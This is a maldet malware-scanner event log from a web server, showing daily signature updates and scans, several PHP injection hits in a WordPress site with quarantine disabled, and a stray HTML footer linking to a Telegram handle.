Mar 15 2026 04:25:40 web1 maldet(1299113): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 15 2026 04:25:40 web1 maldet(1299113): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -6947618c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 15 2026 04:26:14 web1 maldet(1299113): {scan} file list completed in 34s, found 6642 files...
Mar 15 2026 04:26:14 web1 maldet(1299113): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 15 2026 04:26:14 web1 maldet(1299113): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6642 files) in progress...
Mar 15 2026 04:27:39 web1 maldet(1299113): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6642, malware hits 0, cleaned hits 0, time 119s
Mar 15 2026 04:27:39 web1 maldet(1299113): {scan} scan report saved, to view run: maldet --report 260315-0425.1299113
Mar 16 2026 03:53:38 web1 maldet(1685138): {update} checking for available updates...
Mar 16 2026 03:53:38 web1 maldet(1685138): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 16 2026 03:53:38 web1 maldet(1685138): {update} hashing install files and checking against server...
Mar 16 2026 03:53:38 web1 maldet(1685138): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 16 2026 03:53:38 web1 maldet(1685138): {update} latest version already installed.
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} performing signature update check...
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} local signature set is version 202603132091366
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} new signature set 2026031579540 available
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 16 2026 03:53:38 web1 maldet(1685247): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} verified md5sum of maldet-clean.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} unpacked and installed maldet-clean.tgz
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} signature set update completed
Mar 16 2026 03:53:39 web1 maldet(1685247): {sigup} 42289 signatures (39994 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 16 2026 03:53:39 web1 maldet(1685449): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 16 2026 03:53:40 web1 maldet(1685449): {scan} signatures loaded: 42289 (39994 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 16 2026 03:53:40 web1 maldet(1685449): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 16 2026 03:53:40 web1 maldet(1685449): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 16 2026 03:53:40 web1 maldet(1685449): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 16 2026 03:54:15 web1 maldet(1685449): {scan} file list completed in 35s, found 1715 files...
Mar 16 2026 03:54:15 web1 maldet(1685449): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 16 2026 03:54:15 web1 maldet(1685449): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (1715 files) in progress...
Mar 16 2026 03:54:50 web1 maldet(1685449): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 1715, malware hits 0, cleaned hits 0, time 71s
Mar 16 2026 03:54:50 web1 maldet(1685449): {scan} scan report saved, to view run: maldet --report 260316-0353.1685449
Mar 16 2026 11:55:22 web1 maldet(1167): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 17 2026 04:15:10 web1 maldet(321267): {update} checking for available updates...
Mar 17 2026 04:15:10 web1 maldet(321267): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 17 2026 04:15:10 web1 maldet(321267): {update} hashing install files and checking against server...
Mar 17 2026 04:15:11 web1 maldet(321267): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 17 2026 04:15:11 web1 maldet(321267): {update} latest version already installed.
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} performing signature update check...
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} local signature set is version 2026031579541
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} new signature set 2026031678836 available
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 17 2026 04:15:11 web1 maldet(321376): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} verified md5sum of maldet-clean.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} unpacked and installed maldet-clean.tgz
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} signature set update completed
Mar 17 2026 04:15:12 web1 maldet(321376): {sigup} 41572 signatures (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 17 2026 04:15:12 web1 maldet(321584): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 17 2026 04:15:13 web1 maldet(321584): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 17 2026 04:15:13 web1 maldet(321584): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 17 2026 04:15:13 web1 maldet(321584): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 17 2026 04:15:13 web1 maldet(321584): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 17 2026 04:15:55 web1 maldet(321584): {scan} file list completed in 42s, found 6232 files...
Mar 17 2026 04:15:55 web1 maldet(321584): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamscan, using clamav scanner engine...
Mar 17 2026 04:15:55 web1 maldet(321584): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (6232 files) in progress...
Mar 17 2026 04:16:50 web1 maldet(321584): {hit} malware hit {HEX}php.inject.inject.512 found for /home/sps/public_html/index.php
Mar 17 2026 04:16:50 web1 maldet(321584): {hit} malware hit {HEX}php.inject.inject.512 found for /home/sps/public_html/wp-content/upgrade/index.php
Mar 17 2026 04:16:50 web1 maldet(321584): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 6232, malware hits 2, cleaned hits 0, time 98s
Mar 17 2026 04:16:50 web1 maldet(321584): {scan} scan report saved, to view run: maldet --report 260317-0415.321584
Mar 17 2026 04:16:50 web1 maldet(321584): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260317-0415.321584
Mar 18 2026 03:57:37 web1 maldet(720099): {update} checking for available updates...
Mar 18 2026 03:57:38 web1 maldet(720099): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 18 2026 03:57:38 web1 maldet(720099): {update} hashing install files and checking against server...
Mar 18 2026 03:57:38 web1 maldet(720099): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 18 2026 03:57:38 web1 maldet(720099): {update} latest version already installed.
Mar 18 2026 03:57:38 web1 maldet(720208): {sigup} performing signature update check...
Mar 18 2026 03:57:38 web1 maldet(720208): {sigup} local signature set is version 2026031678836
Mar 18 2026 03:57:38 web1 maldet(720208): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 18 2026 03:57:38 web1 maldet(720208): {sigup} latest signature set already installed
Mar 18 2026 03:57:38 web1 maldet(720296): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 18 2026 03:57:38 web1 maldet(720296): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 18 2026 03:57:38 web1 maldet(720296): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 18 2026 03:57:38 web1 maldet(720296): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 18 2026 03:57:38 web1 maldet(720296): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 18 2026 03:58:11 web1 maldet(720296): {scan} file list completed in 33s, found 7373 files...
Mar 18 2026 03:58:11 web1 maldet(720296): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 18 2026 03:58:11 web1 maldet(720296): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (7373 files) in progress...
Mar 18 2026 03:59:22 web1 maldet(720296): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 7373, malware hits 0, cleaned hits 0, time 104s
Mar 18 2026 03:59:22 web1 maldet(720296): {scan} scan report saved, to view run: maldet --report 260318-0357.720296
Mar 18 2026 21:05:36 web1 maldet(1129): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 19 2026 04:13:40 web1 maldet(108529): {update} checking for available updates...
Mar 19 2026 04:13:41 web1 maldet(108529): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 19 2026 04:13:41 web1 maldet(108529): {update} hashing install files and checking against server...
Mar 19 2026 04:13:41 web1 maldet(108529): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 19 2026 04:13:41 web1 maldet(108529): {update} latest version already installed.
Mar 19 2026 04:13:41 web1 maldet(108638): {sigup} performing signature update check...
Mar 19 2026 04:13:41 web1 maldet(108638): {sigup} local signature set is version 2026031678836
Mar 19 2026 04:13:41 web1 maldet(108638): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 19 2026 04:13:41 web1 maldet(108638): {sigup} latest signature set already installed
Mar 19 2026 04:13:41 web1 maldet(108726): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 19 2026 04:13:41 web1 maldet(108726): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 19 2026 04:13:41 web1 maldet(108726): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 19 2026 04:13:41 web1 maldet(108726): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 19 2026 04:13:41 web1 maldet(108726): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 19 2026 04:14:22 web1 maldet(108726): {scan} file list completed in 41s, found 11989 files...
Mar 19 2026 04:14:22 web1 maldet(108726): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 19 2026 04:14:22 web1 maldet(108726): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (11989 files) in progress...
Mar 19 2026 04:19:45 web1 maldet(108726): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 11989, malware hits 0, cleaned hits 0, time 364s
Mar 19 2026 04:19:45 web1 maldet(108726): {scan} scan report saved, to view run: maldet --report 260319-0413.108726
Mar 20 2026 03:38:52 web1 maldet(652128): {update} checking for available updates...
Mar 20 2026 03:38:52 web1 maldet(652128): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 20 2026 03:38:52 web1 maldet(652128): {update} hashing install files and checking against server...
Mar 20 2026 03:38:52 web1 maldet(652128): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 20 2026 03:38:52 web1 maldet(652128): {update} latest version already installed.
Mar 20 2026 03:38:53 web1 maldet(652241): {sigup} performing signature update check...
Mar 20 2026 03:38:53 web1 maldet(652241): {sigup} local signature set is version 2026031678836
Mar 20 2026 03:38:53 web1 maldet(652241): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 20 2026 03:38:53 web1 maldet(652241): {sigup} latest signature set already installed
Mar 20 2026 03:38:53 web1 maldet(652335): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 20 2026 03:38:53 web1 maldet(652335): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 20 2026 03:38:53 web1 maldet(652335): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 20 2026 03:38:53 web1 maldet(652335): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 20 2026 03:38:53 web1 maldet(652335): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 20 2026 03:39:48 web1 maldet(652335): {scan} file list completed in 55s, found 33405 files...
Mar 20 2026 03:39:48 web1 maldet(652335): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 20 2026 03:39:48 web1 maldet(652335): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (33405 files) in progress...
Mar 20 2026 03:42:55 web1 maldet(652335): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 33405, malware hits 0, cleaned hits 0, time 242s
Mar 20 2026 03:42:55 web1 maldet(652335): {scan} scan report saved, to view run: maldet --report 260320-0338.652335
Mar 21 2026 04:05:52 web1 maldet(3492322): {update} checking for available updates...
Mar 21 2026 04:05:52 web1 maldet(3492322): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 21 2026 04:05:52 web1 maldet(3492322): {update} hashing install files and checking against server...
Mar 21 2026 04:05:52 web1 maldet(3492322): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 21 2026 04:05:52 web1 maldet(3492322): {update} latest version already installed.
Mar 21 2026 04:05:52 web1 maldet(3492436): {sigup} performing signature update check...
Mar 21 2026 04:05:52 web1 maldet(3492436): {sigup} local signature set is version 2026031678836
Mar 21 2026 04:05:52 web1 maldet(3492436): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 21 2026 04:05:52 web1 maldet(3492436): {sigup} new signature set 2026032078840 available
Mar 21 2026 04:05:52 web1 maldet(3492436): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-sigpack.tgz.md5
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} downloading https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet-cleanv2.tgz.md5
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} verified md5sum of maldet-sigpack.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} unpacked and installed maldet-sigpack.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} verified md5sum of maldet-clean.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} unpacked and installed maldet-clean.tgz
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} signature set update completed
Mar 21 2026 04:05:53 web1 maldet(3492436): {sigup} 41572 signatures (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 21 2026 04:05:53 web1 maldet(3492684): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 21 2026 04:05:54 web1 maldet(3492684): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 21 2026 04:05:54 web1 maldet(3492684): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 21 2026 04:05:54 web1 maldet(3492684): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 21 2026 04:05:54 web1 maldet(3492684): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 21 2026 04:06:49 web1 maldet(3492684): {scan} file list completed in 55s, found 4328 files...
Mar 21 2026 04:06:49 web1 maldet(3492684): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 21 2026 04:06:49 web1 maldet(3492684): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (4328 files) in progress...
Mar 21 2026 04:07:53 web1 maldet(3492684): {hit} malware hit {HEX}php.inject.inject.512 found for /home/sps/public_html/index.php
Mar 21 2026 04:07:53 web1 maldet(3492684): {hit} malware hit {HEX}php.inject.inject.512 found for /home/sps/public_html/wp-includes/Requests/src/Auth/Basic.css
Mar 21 2026 04:07:53 web1 maldet(3492684): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 4328, malware hits 2, cleaned hits 0, time 120s
Mar 21 2026 04:07:53 web1 maldet(3492684): {scan} scan report saved, to view run: maldet --report 260321-0405.3492684
Mar 21 2026 04:07:53 web1 maldet(3492684): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260321-0405.3492684
Mar 21 2026 08:13:31 web1 maldet(1161): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
Mar 22 2026 06:21:04 web1 maldet(557948): {update} checking for available updates...
Mar 22 2026 06:21:04 web1 maldet(557948): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.ver
Mar 22 2026 06:21:04 web1 maldet(557948): {update} hashing install files and checking against server...
Mar 22 2026 06:21:04 web1 maldet(557948): {update} downloaded https://cdn.rfxn.com/downloads/maldet.current.hash
Mar 22 2026 06:21:04 web1 maldet(557948): {update} latest version already installed.
Mar 22 2026 06:21:04 web1 maldet(558057): {sigup} performing signature update check...
Mar 22 2026 06:21:04 web1 maldet(558057): {sigup} local signature set is version 2026031678836
Mar 22 2026 06:21:05 web1 maldet(558057): {sigup} downloaded https://cdn.rfxn.com/downloads/maldet.sigs.ver
Mar 22 2026 06:21:05 web1 maldet(558057): {sigup} latest signature set already installed
Mar 22 2026 06:21:05 web1 maldet(558146): {scan} launching scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ changes in last 1d to background, see /usr/local/maldetect/logs/event_log for progress
Mar 22 2026 06:21:05 web1 maldet(558146): {scan} signatures loaded: 41572 (39277 MD5 | 2290 HEX | 5 YARA | 0 USER)
Mar 22 2026 06:21:05 web1 maldet(558146): {scan} building file list for /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ of new/modified files from last 1 days, this might take awhile...
Mar 22 2026 06:21:05 web1 maldet(558146): {scan} setting nice scheduler priorities for all operations: cpunice 19 , ionice 6
Mar 22 2026 06:21:05 web1 maldet(558146): {scan} executed /bin/nice -n 19 /bin/ionice -c2 -n 6 /bin/find /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ /tmp /var/tmp /dev/shm  -path &quot;/usr/local/maldetect&quot; -prune -o -maxdepth 15 -regextype posix-egrep \( -mtime -1 -o -ctime -1 \) -type f -size +24c -size -25976319c  -not -perm 000   -not -uid 0 -not -gid 0  
Mar 22 2026 06:21:41 web1 maldet(558146): {scan} file list completed in 36s, found 481 files...
Mar 22 2026 06:21:41 web1 maldet(558146): {scan} found clamav binary at /usr/local/cpanel/3rdparty/bin/clamdscan, using clamav scanner engine...
Mar 22 2026 06:21:41 web1 maldet(558146): {scan} scan of /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/ (481 files) in progress...
Mar 22 2026 06:21:58 web1 maldet(558146): {hit} malware hit {HEX}php.inject.inject.512 found for /home/sps/public_html/index.php
Mar 22 2026 06:21:59 web1 maldet(558146): {scan} scan completed on /home?/?/public_html/,/var/www/,/usr/local/apache/htdocs/: files 481, malware hits 1, cleaned hits 0, time 54s
Mar 22 2026 06:21:59 web1 maldet(558146): {scan} scan report saved, to view run: maldet --report 260322-0621.558146
Mar 22 2026 06:21:59 web1 maldet(558146): {scan} quarantine is disabled! set quarantine_hits=1 in conf.maldet or to quarantine results run: maldet -q 260322-0621.558146
Mar 22 2026 14:06:02 web1 maldet(1152): {mon} could not find inotifywait command, install yum package inotify-tools or download from https://github.com/rvoicilas/inotify-tools/wiki/
</pre></div><div class="footer">

                        <a href="https://t.me/HEX80" class="telegram-link" target="_blank">

                            <span>@</span>

                            <span>Telegram</span>

                        </a>

                      </div>